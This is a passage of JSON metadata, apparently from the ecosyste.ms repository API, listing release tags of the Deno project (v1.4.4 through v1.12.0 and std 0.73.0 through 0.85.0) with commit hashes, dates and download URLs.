hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","ta